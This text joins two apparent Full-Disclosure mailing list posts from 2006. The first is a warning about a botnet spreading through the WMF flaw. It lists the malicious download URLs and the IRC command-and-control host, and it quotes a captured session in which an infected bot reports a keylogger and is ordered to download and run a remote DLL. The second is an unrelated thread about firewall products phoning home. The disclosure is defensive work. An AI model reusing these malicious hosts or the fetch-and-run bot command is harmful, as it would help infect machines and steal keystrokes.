Seems to be a botnet forming with the help of exploiting the recent wmf flaw on the following site. AFAIK malware/adware is referencing this. D O N O T C L I C K http://213.17.233.194/mediabar.wmf http://213.17.233.194/stat_s3.php http://213.17.233.194/stat.html D O N O T C L I C K This injects a trojan connecting to 219.240.142.59 on port 44234 44234/tcp open irc Unreal ircd 47292/tcp open irc Unreal ircd 47296/tcp open irc Unreal ircd 54729/tcp open irc-proxypsyBNC 2.3.1 Channel stats list around 500 bots and around 1200 connected (may or may not be accurate), however if you poke around you will find http://219.240.142.59/usage/, containing some interesting links and info about when this most likely started. The tcp stream below demos the login, and calling of http://219.240.142.59/ppp/mediax.dll. Stats for January list close to 90k hits on this particular file(!). NICK * USER plnaehe 0 0 :* :irc.foonet.com NOTICE AUTH :*** Looking up your hostname... :irc.foonet.com NOTICE AUTH :*** Found your hostname :irc.foonet.com 001 *:Welcome to the ROXnet IRC Network * :irc.foonet.com 002 *:Your host is irc.foonet.com, running version Unreal3.2.3 :irc.foonet.com 003 *:This server was created Thu Oct 13 2005 at 17:25:57 KST :irc.foonet.com 005 *SAFELIST HCN MAXCHANNELS=10 CHANLIMIT=#:10 MAXLIST=b:60,e:60,I:60 NICKLEN=30 CHANNELLEN=32 TOPICLEN=307 KICKLEN=307 AWAYLEN=307 MAXTARGETS=20 WALLCHOPS WATCH=128 :are supported by this server :irc.foonet.com 005 *SILENCE=15 MODES=12 CHANTYPES=# PREFIX=(ohv)@%+ CHANMODES=beIqa,kfL,lj,psmntirRcOAQKVGCuzNSMTG NETWORK=ROXnet CASEMAPPING=ascii EXTBAN=~,cqnr ELIST=MNUCT [EMAIL PROTECTED] EXCEPTS INVEX CMDS=KNOCK,MAP,DCCALLOW,USERIP :are supported by this server :irc.foonet.com 251 *:There are 1 users and 1194 invisible on 1 servers :irc.foonet.com 252 *1 :operator(s) online :irc.foonet.com 253 *201 :unknown connection(s) :irc.foonet.com 254 *10 :channels formed :irc.foonet.com 255 *:I have 1195 clients and 0 servers :irc.foonet.com 265 *:Current Local Users: 1195 Max: 5529 :irc.foonet.com 266 *:Current Global Users: 1195 Max: 1276 :irc.foonet.com 422 *:MOTD File is missing *MODE *:+iwTxd USERHOST * :irc.foonet.com 302 *:* MODE *-x+B JOIN #mrbean5 rowan PRIVMSG *:[KEYLOG]: Key logger active. USERHOST * MODE *-x+B JOIN #mrbean5 rowan USERHOST * MODE *-x+B JOIN #mrbean5 rowan :irc.foonet.com NOTICE *:BOTMOTD File not found *MODE *:-x+B * JOIN :#mrbean5 :irc.foonet.com 332 *#mrbean5 :.wipe http://219.240.142.59/ppp/mediax.dll mediax.dll 3 :irc.foonet.com 333 *#mrbean5 DDDI 1137401387 :irc.foonet.com 353 *@ #mrbean5 * :irc.foonet.com 366 *#mrbean5 :End of /NAMES list. *PRIVMSG *:[KEYLOG]: Key logger active. :irc.foonet.com 302 * :irc.foonet.com 302 * PRIVMSG #mrbean5 :[DOWNLOAD]: Downloading URL: http://219.240.142.59/ppp/mediax.dll to: mediax.dll. :irc.foonet.com 404 *#mrbean5 :You need voice (+v) (#mrbean5) PRIVMSG #mrbean5 :[DOWNLOAD]: Downloaded 214.5 KB to C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\\mediax.dll @ 71.5 KB/sec. PRIVMSG #mrbean5 :[DOWNLOAD]: Opened: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\\mediax.dll. :irc.foonet.com 404 *#mrbean5 :You need voice (+v) (#mrbean5) :irc.foonet.com 404 *#mrbean5 :You need voice (+v) (#mrbean5) _ Don't just search. Find. Check out the new MSN Search! http://search.msn.click-url.com/go/onm00200636ave/direct/01/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Re: Re: PC Firewall Choices
I guess I will stick with Kasperky which will probably phone home to Russia or something. Does anyone have any experience with the Firewall that comes with paid AVG? I just run free AVG currently on most computers so have not used it . Regards, Nancy Kramer At 01:15 AM 1/20/2006, [EMAIL PROTECTED] wrote: I have been following this discussion waiting for someone to mention another feature of Zone Alarm: Posted January 13, 3:00 a.m. PST Pacific Time, ROBERT X. CRINGELY http://www.infoworld.com/ A Perfect Spy? It seems that ZoneAlarm Security Suite has been phoning home, even when told not to. Last fall, InfoWorld Senior Contributing Editor James Borck discovered ZA 6.0 was surreptitiously sending encrypted data back to four different servers, despite disabling all of the suite's communications options. Zone Labs denied the flaw for nearly two months, then eventually chalked it up to a bug in the software -- even though instructions to contact the servers were set out in the program's XML code. A company spokesmodel says a fix for the flaw will be coming soon and worried users can get around the bug by modifying their Host file settings. However, there's no truth to the rumor that the NSA used ZoneAlarm to spy on U.S. citizens. :) Hummer - Original Message - From: Nancy Kramer [EMAIL PROTECTED] To: Greg [EMAIL PROTECTED]; full-disclosure@lists.grok.org.uk Sent: Thursday, January 19, 2006 11:27 PM Subject: RE: [Full-disclosure] Re: Re: PC Firewall Choices I have the paid ZA but I heard the free one was better. Have no idea about that but would never buy the paid version again. At least now I know what was happening. Will try to look for that feature and set it to the maximum minutes. I only have it on my laptop which only goes on the internet sporadically but generally goes on the internet on public wireless networks which I think may not be all that secure. Lots of times I am meeting with someone there and we talk and then lookup something on the internet. I could see how time could pass quickly and I might not touch the computer for awhile. Thanks for the explanation. Regards, Nancy Kramer At 10:10 PM 1/19/2006, Greg wrote: -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of Nancy Kramer Sent: Friday, 20 January 2006 2:30 PM To: Stan Bubrouski; full-disclosure@lists.grok.org.uk Subject: Re: [Full-disclosure] Re: Re: PC Firewall Choices I admit I know nothing about firewalls but with ZA I have had to shut it down sometimes to go onto the internet. I have no idea why. I just can't get on and when I shut it down I can. That'd be a well known and never fixed bug I reported to Zonelabs some years back now. It has a feature to automatically lock internet connection after so many minutes of inactivity. The length of time can be changed by the user. What it REALLY did was cut off access to internet and any LAN you were on, isolating you entirely and never actually let go of it when the user was back at the keyboard. Exiting ZA let that go and internet and lan were restored. You have the option to turn that feature OFF but even that didn't stop the whole thing happening. So, about the only thing you could do was to set the auto lock as high as it could go and turn the feature off. It would still go off after that many minutes had passed (which I believe is 999 in the PRO version and 99 in the free version) and lock you out again but it was delayed by that much, at least. You CAN set certain programs to pass by its' lock, however. So, if you have some computers almost always chattering away on a distributed project but otherwise not touched, you could allow those programs to pass on even though, should you attempt to get out with a simple web browser (where it wasn't allowed to pass the lock), you cant. Saves some stuffing about on such machines and let's face it - the more free some company execs see, the more likely they are to use it. Surprising how many Windows based companies use free ZA. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- No virus found in this incoming message. Checked by AVG Anti-Virus. Version: 7.1.375 / Virus Database: 267.14.19/231 - Release Date: 1/16/2006 -- No virus found in this outgoing message. Checked by AVG Anti-Virus. Version: 7.1.375 / Virus Database: 267.14.19/231 - Release Date: 1/16/2006 ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia -